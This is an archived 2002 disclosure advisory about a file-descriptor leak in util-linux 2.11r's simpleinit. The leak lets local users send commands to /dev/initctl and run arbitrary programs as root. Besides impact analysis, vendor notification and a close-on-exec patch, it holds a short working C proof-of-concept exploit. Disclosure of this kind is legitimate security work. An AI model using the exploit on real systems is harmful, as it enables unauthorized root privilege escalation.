Background ---------- Simpleinit is an init program for Linux systems. It is included in the util-linux distribution. More information about simpleinit is available at <http://www.atnf.csiro.au/people/rgooch/linux/boot-scripts/>. Problem ------- Simpleinit leaves a file descriptor open in some child processes. The descriptor is used by simpleinit to read messages from a FIFO (/dev/initctl); this FIFO is normally used by the initctl, need, and provide programs to pass instructions to simpleinit. However, simpleinit opens the FIFO read-write, so any process that inherits the descriptor can pass instructions to simpleinit. (Opening the FIFO read-write is not a bug; rather it ensures there is always a writer for the FIFO, so EOF is not reported.) This has been observed in the simpleinit from util-linux 2.11r (the latest version). Impact ------ A local user with a process that inherits the file descriptor can easily cause simpleinit to execute an arbitrary program or script with root privileges. There are assuredly numerous other local exploits. There may also be some remote exploits. For example, if an ftp server allows access to file descriptors through the /proc filesystem. Not all processes inherit the file descriptors. Getty processes started from lines in /etc/inittab do not, so users logging in on the virtual consoles will typically not have access to this exploit. On the other hand, if the boot scripts start xdm, then a user logging in through xdm will be able to use the file descriptor. Exploit ------- A sample exploit program is attached. Patch ----- A small patch is attached. Vendor notification ------------------- Richard Gooch <rgoochat_private>, the simpleinit maintainer, was notified of this problem May 20, 2002. On May 26, I learned of the simpleinit-msb variant <http://www.winterdrache.de/linux/newboot/>, maintained by Matthias Benkmann <m.s.bat_private>, and notified him of this problem. He released a patched version of simpleinit-msb the same day. (Kudos for the fast reaction!) -- patsmithat_private #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include "simpleinit.h" /* From the util-linux source */ int main() { int fd = 3; char buf[COMMAND_SIZE]; struct command_struct* cmd = (struct command_struct*) buf; memset(buf, '\0', sizeof(buf)); cmd->command = COMMAND_NEED; cmd->pid = 17; cmd->ppid = 16; strcpy(cmd->name, "/home/pat/x/foo"); /* foo will be run as root */ write(fd, buf, COMMAND_SIZE); return 0; } --- login-utils/simpleinit.c.orig 2001-09-29 11:09:10.000000000 -0400 +++ login-utils/simpleinit.c 2002-05-23 22:16:07.000000000 -0400 @@ -203,6 +203,18 @@ if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 ) err ( _("error opening fifo\n") ); } + if ( initctl_fd >= 0 ) + if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) { + err ( _("error setting close-on-exec on /dev/initctl") ); + /* Can the fcntl ever fail? If it does, and we leave + the descriptor open in child processes, then any + process on the system will be able to write to + /dev/initctl and have us execute arbitrary commands + as root. So let's refuse to use the fifo in this + case. */ + close(initctl_fd); + initctl_fd = -1; + } if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();
This archive was generated by hypermail 2b30 : Thu Jun 13 2002 - 07:51:09 PDT